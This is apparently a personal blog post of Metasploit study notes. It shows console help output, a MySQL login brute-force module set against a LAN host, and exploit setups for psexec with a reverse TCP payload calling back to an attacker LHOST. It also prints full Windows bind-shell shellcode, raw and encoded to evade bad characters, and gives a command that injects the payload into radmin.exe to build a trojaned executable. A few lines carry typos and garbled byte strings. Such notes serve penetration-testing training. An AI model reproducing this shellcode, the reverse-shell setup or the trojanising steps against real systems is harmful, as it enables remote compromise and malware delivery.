msf6 > loot -h
Usage: loot [options]
 Info: loot [-h] [addr1 addr2 ...] [-t <type1,type2>]
  Add: loot -f [fname] -i [info] -a [addr1 addr2 ...] -t [type]
  Del: loot -d [addr1 addr2 ...]


OPTIONS:

    -a, --add                 Add loot to the list of addresses, instead of listing.
    -d, --delete              Delete *all* loot matching host and type.
    -f, --file <filename>     File with contents of the loot to add.
    -h, --help                Show this help information.
    -i, --info <info>         Info of the loot to add.
    -S, --search <filter>     Search string to filter by.
    -t, --type <type1,type2>  Search for a list of types.
    -u, --update              Update loot. Not officially supported.



msf6 > vulns -h
Print all vulnerabilities in the database

Usage: vulns [addr range]


OPTIONS:

    -d, --delete             Delete vulnerabilities. Not officially supported.
    -h, --help               Show this help information.
    -i, --info               Display vuln information.
    -o, --output <filename>  Send output to a file in csv format.
    -p, --port <port>        List vulns matching this port spec.
    -R, --rhosts             Set RHOSTS from the results of the search.
    -S, --search <filter>    Search string to filter by.
    -s, --service <name>     List vulns matching these service names.

Examples:
  vulns -p 1-65536          # only vulns with associated services
  vulns -p 1-65536 -s http  # identified as http on any port

  • set / unset / setg / unsetg / save

  • Run/ exploit

  • jobs / kill 0

  • load / unload /loadpath

  • Session

    • session -l/ -i( Shell 、Meterpreter session、VNC )
  • route 通过指定 session 路由流量

  • irb ( Framework::Version )

  • Resource ( msfconsol -r arc

msf6 > search mysql_login

Matching Modules
================

   #  Name                                 Disclosure Date  Rank    Check  Description
   -  ----                                 ---------------  ----    -----  -----------
   0  auxiliary/scanner/mysql/mysql_login                   normal  No     MySQL Login Utility


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/mysql/mysql_login                                                             

msf6 > use auxiliary/scanner/mysql/mysql_login 
msf6 auxiliary(scanner/mysql/mysql_login) > 
msf6 auxiliary(scanner/mysql/mysql_login) > 
msf6 auxiliary(scanner/mysql/mysql_login) > show options

Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple store
                                                d in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current da
                                                tabase to the list
   DB_ALL_USERS      false            no        Add all users in the current databa
                                                se to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in
                                                 the current database (Accepted: no
                                                ne, user, user&realm)
   PASSWORD                           no        A specific password to authenticate
                                                 with
   PASS_FILE                          no        File containing passwords, one per
                                                line
   Proxies                            no        A proxy chain of format type:host:p
                                                ort[,type:host:port][...]
   RHOSTS                             yes       The target host(s), see https://git
                                                hub.com/rapid7/metasploit-framework
                                                /wiki/Using-Metasploit
   RPORT             3306             yes       The target port (TCP)
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential wor
                                                ks for a host
   THREADS           1                yes       The number of concurrent threads (m
                                                ax one per host)
   USERNAME          root             no        A specific username to authenticate
                                                 as
   USERPASS_FILE                      no        File containing users and passwords
                                                 separated by space, one pair per l
                                                ine
   USER_AS_PASS      false            no        Try the username as the password fo
                                                r all users
   USER_FILE                          no        File containing usernames, one per
                                                line
   VERBOSE           true             yes       Whether to print output for all att
                                                empts


View the full module info with the info, or info -d command.


msf6 auxiliary(scanner/mysql/mysql_login) > set rhosts 192.168.1.121
rhosts => 192.168.1.121
msf6 auxiliary(scanner/mysql/mysql_login) > show options

Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple store
                                                d in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current da
                                                tabase to the list
   DB_ALL_USERS      false            no        Add all users in the current databa
                                                se to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in
                                                 the current database (Accepted: no
                                                ne, user, user&realm)
   PASSWORD                           no        A specific password to authenticate
                                                 with
   PASS_FILE                          no        File containing passwords, one per
                                                line
   Proxies                            no        A proxy chain of format type:host:p
                                                ort[,type:host:port][...]
   RHOSTS            192.168.1.121    yes       The target host(s), see https://git
                                                hub.com/rapid7/metasploit-framework
                                                /wiki/Using-Metasploit
   RPORT             3306             yes       The target port (TCP)
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential wor
                                                ks for a host
   THREADS           1                yes       The number of concurrent threads (m
                                                ax one per host)
   USERNAME          root             no        A specific username to authenticate
                                                 as
   USERPASS_FILE                      no        File containing users and passwords
                                                 separated by space, one pair per l
                                                ine
   USER_AS_PASS      false            no        Try the username as the password fo
                                                r all users
   USER_FILE                          no        File containing usernames, one per
                                                line
   VERBOSE           true             yes       Whether to print output for all att
                                                empts


View the full module info with the info, or info -d command.


                                                                                                                    
msf6 > load -h
Usage: load <option> [var=val var=val ...]                                                                          
                                                                                                                    
Loads a plugin from the supplied path.                                                                              
For a list of built-in plugins, do: load -l                                                                         
For a list of loaded plugins, do: load -s                                                                           
The optional var=val options are custom parameters that can be passed to plugins.                                   
                                                                                                                    
msf6 > load openvas                                                                                                 
[*] Welcome to OpenVAS integration by kost and averagesecurityguy.                                                  
[*]                                                                                                                 
[*] OpenVAS integration requires a database connection. Once the                                                    
[*] database is ready, connect to the OpenVAS server using openvas_connect.                                         
[*] For additional commands use openvas_help.                                                                       
[*]                                                                                                                 
[*] Successfully loaded plugin: OpenVAS                                                                             
msf6 > openvas_help                                                                                                 
[*] openvas_help                  Display this help                                                                 
[*] openvas_debug                 Enable/Disable debugging                                                          
[*] openvas_version               Display the version of the OpenVAS server                                              
[*] 
[*] CONNECTION
[*] ==========
[*] openvas_connect               Connects to OpenVAS
[*] openvas_disconnect            Disconnects from OpenVAS
[*] 
[*] TARGETS
[*] =======
[*] openvas_target_create         Create target
[*] openvas_target_delete         Deletes target specified by ID
[*] openvas_target_list           Lists targets
[*] 
[*] TASKS
[*] =====
[*] openvas_task_create           Create task
[*] openvas_task_delete           Delete a task and all associated reports
[*] openvas_task_list             Lists tasks
[*] openvas_task_start            Starts task specified by ID
[*] openvas_task_stop             Stops task specified by ID
[*] openvas_task_pause            Pauses task specified by ID
[*] openvas_task_resume           Resumes task specified by ID
[*] openvas_task_resume_or_start  Resumes or starts task specified by ID
[*] 
[*] CONFIGS
[*] =======
[*] openvas_config_list           Lists scan configurations
[*] 
[*] FORMATS
[*] =======
[*] openvas_format_list           Lists available report formats
[*] 
[*] REPORTS
[*] =======
[*] openvas_report_list           Lists available reports
[*] openvas_report_delete         Delete a report specified by ID
[*] openvas_report_import         Imports an OpenVAS report specified by ID
[*] openvas_report_download       Downloads an OpenVAS report specified by ID


sf6 > route -h
Route traffic destined to a given subnet through a supplied session.

Usage:
  route [add/remove] subnet netmask [comm/sid]
  route [add/remove] cidr [comm/sid]
  route [get] <host or network>
  route [flush]
  route [print]

Subcommands:
  add - make a new route
  remove - delete a route; 'del' is an alias
  flush - remove all routes
  get - display the route for a given target
  print - show all active routes

Examples:
  Add a route for all hosts from 192.168.0.0 to 192.168.0.255 through session 1
    route add 192.168.0.0 255.255.255.0 1
    route add 192.168.0.0/24 1

  Delete the above route
    route remove 192.168.0.0/24 1
    route del 192.168.0.0 255.255.255.0 1

  Display the route that would be used for the given host or network
    route get 192.168.0.11


msf6 > irb
[*] Starting IRB shell...
[*] You are in the "framework" object

irb: warn: can't alias jobs from irb_jobs.
>> exit
msf6 > resource
Usage: resource path1 [path2 ...]
                                
Run the commands stored in the supplied files (- for stdin).
Resource files may also contain ERB or Ruby code between <ruby></ruby> tags.
                                
See also: makerc                
                                
msf6 >  

Exploit 模块

  • Active exploit (主动)

    • use exploit/windows/smb/psexec

    • set RHOST 192.168.1.100

    • set PAYLQAD windows/shell/reverse_tcp

    • set LHOST 192.168.1.1

    • set LPORT 4444

    • set SMBUSER user1

    • set SMBPASS pass1

    • exploit

  • Passive Exploits(被动)

    • use exploit/windows/browser/ms07_017_ani_loadimage_chunksize

    • set URIPATH /

    • set PAYLOAD windows/shell/reverse_tcp

    • set LHOST 192.168.1.1

    • set LPORT 4444

    • exploit

生成payload

  • use payload/windows/shell_bind_tcp

  • generate (坏字符)

  • msf自动选择编码模块绕过坏字符

    • generate -b x00!
    • generate -b 'x00\x44\x67\x66\xfa\x01\xe\x44\x67\xa1\xa2\xa3\x75\x4b'
    • generate -b 'x00\x44\x67\x66\xfa\x01\xe0\x44\x67\xa\xa2\xa3\x75\x4b\xFE\x0a\x0b\x01\xcc\x6e\x1e\x2e\x26'
  • 动指定编码模块

    • show encoders / generate -e x86/nonalpha
msf6 > use payload/windows/shell_bind_tcp
msf6 payload(windows/shell_bind_tcp) > show options

Module options (payload/windows/shell_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address


View the full module info with the info, or info -d command.


msf6 payload(windows/shell_bind_tcp) > generate
# windows/shell_bind_tcp - 328 bytes
# https://metasploit.com/
# VERBOSE=false, LPORT=4444, PrependMigrate=false, 
# EXITFUNC=process, CreateSession=true, AutoVerifySession=true
buf = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" +
"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" +
"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" +
"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" +
"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" +
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" +
"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" +
"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32" +
"\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff" +
"\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b" +
"\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40\x50\x68" +
"\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89\xe6" +
"\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57\x68\xb7" +
"\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57" +
"\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" +
"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" +
"\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" +
"\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" +
"\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" +
"\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" +
"\x6f\x6a\x00\x53\xff\xd5"



msf6 payload(windows/shell_bind_tcp) > generate -b '\x00'
# windows/shell_bind_tcp - 355 bytes
# https://metasploit.com/
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=4444, PrependMigrate=false, 
# EXITFUNC=process, CreateSession=true, AutoVerifySession=true
buf = 
"\xbb\x62\xd8\x91\xc1\xda\xd6\xd9\x74\x24\xf4\x5d\x29\xc9" +
"\xb1\x53\x83\xc5\x04\x31\x5d\x0e\x03\x3f\xd6\x73\x34\x43" +
"\x0e\xf1\xb7\xbb\xcf\x96\x3e\x5e\xfe\x96\x25\x2b\x51\x27" +
"\x2d\x79\x5e\xcc\x63\x69\xd5\xa0\xab\x9e\x5e\x0e\x8a\x91" +
"\x5f\x23\xee\xb0\xe3\x3e\x23\x12\xdd\xf0\x36\x53\x1a\xec" +
"\xbb\x01\xf3\x7a\x69\xb5\x70\x36\xb2\x3e\xca\xd6\xb2\xa3" +
"\x9b\xd9\x93\x72\x97\x83\x33\x75\x74\xb8\x7d\x6d\x99\x85" +
"\x34\x06\x69\x71\xc7\xce\xa3\x7a\x64\x2f\x0c\x89\x74\x68" +
"\xab\x72\x03\x80\xcf\x0f\x14\x57\xad\xcb\x91\x43\x15\x9f" +
"\x02\xaf\xa7\x4c\xd4\x24\xab\x39\x92\x62\xa8\xbc\x77\x19" +
"\xd4\x35\x76\xcd\x5c\x0d\x5d\xc9\x05\xd5\xfc\x48\xe0\xb8" +
"\x01\x8a\x4b\x64\xa4\xc1\x66\x71\xd5\x88\xee\xb6\xd4\x32" +
"\xef\xd0\x6f\x41\xdd\x7f\xc4\xcd\x6d\xf7\xc2\x0a\x91\x22" +
"\xb2\x84\x6c\xcd\xc3\x8d\xaa\x99\x93\xa5\x1b\xa2\x7f\x35" +
"\xa3\x77\x15\x3d\x02\x28\x08\xc0\xf4\x98\x8c\x6a\x9d\xf2" +
"\x02\x55\xbd\xfc\xc8\xfe\x56\x01\xf3\x11\xfb\x8c\x15\x7b" +
"\x13\xd9\x8e\x13\xd1\x3e\x07\x84\x2a\x15\x3f\x22\x62\x7f" +
"\xf8\x4d\x73\x55\xae\xd9\xf8\xba\x6a\xf8\xfe\x96\xda\x6d" +
"\x68\x6c\x8b\xdc\x08\x71\x86\xb6\xa9\xe0\x4d\x46\xa7\x18" +
"\xda\x11\xe0\xef\x13\xf7\x1c\x49\x8a\xe5\xdc\x0f\xf5\xad" +
"\x3a\xec\xf8\x2c\xce\x48\xdf\x3e\x16\x50\x5b\x6a\xc6\x07" +
"\x35\xc4\xa0\xf1\xf7\xbe\x7a\xad\x51\x56\xfa\x9d\x61\x20" +
"\x03\xc8\x17\xcc\xb2\xa5\x61\xf3\x7b\x22\x66\x8c\x61\xd2" +
"\x89\x47\x22\xe2\xc3\xc5\x03\x6b\x8a\x9c\x11\xf6\x2d\x4b" +
"\x55\x0f\xae\x79\x26\xf4\xae\x08\x23\xb0\x68\xe1\x59\xa9" +
"\x1c\x05\xcd\xca\x34"
msf6 payload(windows/shell_bind_tcp) > 


msf6 payload(windows/shell_bind_tcp) > generate -b 'x00x44\x67x66\xfalx01\xe0x44x67xa1\xa2xa3\x75\x4b'
# windows/shell_bind_tcp - 350 bytes
# https://metasploit.com/
# Encoder: x86/fnstenv_mov
# VERBOSE=false, LPORT=4444, PrependMigrate=false, 
# EXITFUNC=process, CreateSession=true, AutoVerifySession=true
buf = 
"\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x0e" +
"\x5a\x89\xa1\x83\xeb\xfc\xe2\xf4\xf2\xb2\x0b\xa1\x0e\x5a" +
"\xe9\x28\xeb\x6b\x49\xc5\x85\x0a\xb9\x2a\x5c\x56\x02\xf3" +
"\x1a\xd1\xfb\x89\x01\xed\xc3\x87\x3f\xa5\x25\x9d\x6f\x26" +
"\x8b\x8d\x2e\x9b\x46\xac\x0f\x9d\x6b\x53\x5c\x0d\x02\xf3" +
"\x1e\xd1\xc3\x9d\x85\x16\x98\xd9\xed\x12\x88\x70\x5f\xd1" +
"\xd0\x81\x0f\x89\x02\xe8\x16\xb9\xb3\xe8\x85\x6e\x02\xa0" +
"\xd8\x6b\x76\x0d\xcf\x95\x84\xa0\xc9\x62\x69\xd4\xf8\x59" +
"\xf4\x59\x35\x27\xad\xd4\xea\x02\x02\xf9\x2a\x5b\x5a\xc7" +
"\x85\x56\xc2\x2a\x56\x46\x88\x72\x85\x5e\x02\xa0\xde\xd3" +
"\xcd\x85\x2a\x01\xd2\xc0\x57\x00\xd8\x5e\xee\x05\xd6\xfb" +
"\x85\x48\x62\x2c\x53\x32\xba\x93\x0e\x5a\xe1\xd6\x7d\x68" +
"\xd6\xf5\x66\x16\xfe\x87\x09\xa5\x5c\x19\x9e\x5b\x89\xa1" +
"\x27\x9e\xdd\xf1\x66\x73\x09\xca\x0e\xa5\x5c\xcb\x06\x03" +
"\xd9\x43\xf3\x1a\xd9\xe1\x5e\x32\x63\xae\xd1\xba\x76\x74" +
"\x99\x32\x8b\xa1\x1f\x06\x00\x47\x64\x4a\xdf\xf6\x66\x98" +
"\x52\x96\x69\xa5\x5c\xf6\x66\xed\x60\x99\xf1\xa5\x5c\xf6" +
"\x66\x2e\x65\x9a\xef\xa5\x5c\xf6\x99\x32\xfc\xcf\x43\x3b" +
"\x76\x74\x66\x39\xe4\xc5\x0e\xd3\x6a\xf6\x59\x0d\xb8\x57" +
"\x64\x48\xd0\xf7\xec\xa7\xef\x66\x4a\x7e\xb5\xa0\x0f\xd7" +
"\xcd\x85\x1e\x9c\x89\xe5\x5a\x0a\xdf\xf7\x58\x1c\xdf\xef" +
"\x58\x0c\xda\xf7\x66\x23\x45\x9e\x88\xa5\x5c\x28\xee\x14" +
"\xdf\xe7\xf1\x6a\xe1\xa9\x89\x47\xe9\x5e\xdb\xe1\x79\x14" +
"\xac\x0c\xe1\x07\x9b\xe7\x14\x5e\xdb\x66\x8f\xdd\x04\xda" +
"\x72\x41\x7b\x5f\x32\xe6\x1d\x28\xe6\xcb\x0e\x09\x76\x74"
msf6 payload(windows/shell_bind_tcp) > 

  • generate -b 'x00' -t exe -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f/root/1.exe

  • NOP :no-operation/Next Operation(无任何操作)

    • EIP返回到存储NOP sled的任意地址时将递增,最终导致shellcode执行

    • generate -s 14

msf6 payload(windows/shell_bind_tcp) > generate -b 'x00' -t exe -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f/root/1.exe
Usage: generate [options]

Generates a payload. Datastore options may be supplied after normal options.

Example: generate -f python LHOST=127.0.0.1

OPTIONS:

    -b   The list of characters to avoid example: '\x00\xff'
    -E   Force encoding
    -e   The encoder to use
    -f   Output format: base32,base64,bash,c,csharp,dw,dword,go,golang,hex,java,js_be,js_le,nim,nimlang,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,rust,rustlang,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,python-reflection,vba,vba-exe,vba-psh,vbs,war
    -h   Show this message
    -i   The number of times to encode the payload
    -k   Preserve the template behavior and inject the payload as a new thread
    -n   Prepend a nopsled of [length] size on to the payload
    -o   The output file name (otherwise stdout)
    -O   Deprecated: alias for the '-o' option
    -p   The platform of the payload
    -P   Total desired payload size, auto-produce appropriate NOP sled length
    -S   The new section name to use when generating (large) Windows binaries
    -v   Verbose output (display stage in addition to stager)
    -x   Specify a custom executable file to use as a template

posted on 2023-09-25 17:33  depressiom  阅读(119)  评论(0编辑  收藏  举报